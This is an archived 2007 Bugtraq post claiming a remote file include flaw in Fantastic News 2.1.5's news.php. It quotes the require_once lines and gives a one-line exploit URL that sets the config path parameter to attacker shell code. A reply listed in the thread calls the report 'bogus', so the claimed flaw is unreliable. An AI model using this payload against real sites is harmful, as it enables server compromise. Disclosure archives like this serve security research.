Bugtraq mailing list archives

Fantastic News <=- (news.php) Remote File Include Vulnerability

From: "me you" <r.5.7 () hotmail com>
Date: Sun, 21 Jan 2007 12:42:55 +0000

#######################################################

Fantastic News <=- (news.php) Remote File Include Vulnerability ...

Script: Fantastic News

Version: 2.1.5

URL : http://fscripts.com/download.php?file=1

Author: BorN To K!LL

#######################################################

Bug in :.  news.php

code :
require_once($CONFIG['script_path']."functions/functions.php");
require_once($CONFIG['script_path']."functions/mysql.php");
require_once($CONFIG['script_path']."functions/template.php");

#######################################################

Explo!t :.
/news.php?CONFIG['script_path']=[SHe1L-Code]

#######################################################

GreeTz to :.

Dr.2 , Asbmay , General C , ToOoFa , SHiKaA , str0ke ,ThE-LoRd-Of-CrAcKiNg .....


#######################################################

_________________________________________________________________

FREE pop-up blocking with the new MSN Toolbar - get it now!http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

Current thread:

Fantastic News <=- (news.php) Remote File Include Vulnerability me you (Jan 22)
- Re: Fantastic News <=- (news.php) Remote File Include Vulnerability <- bogus... again Mailinglists Address (Jan 23)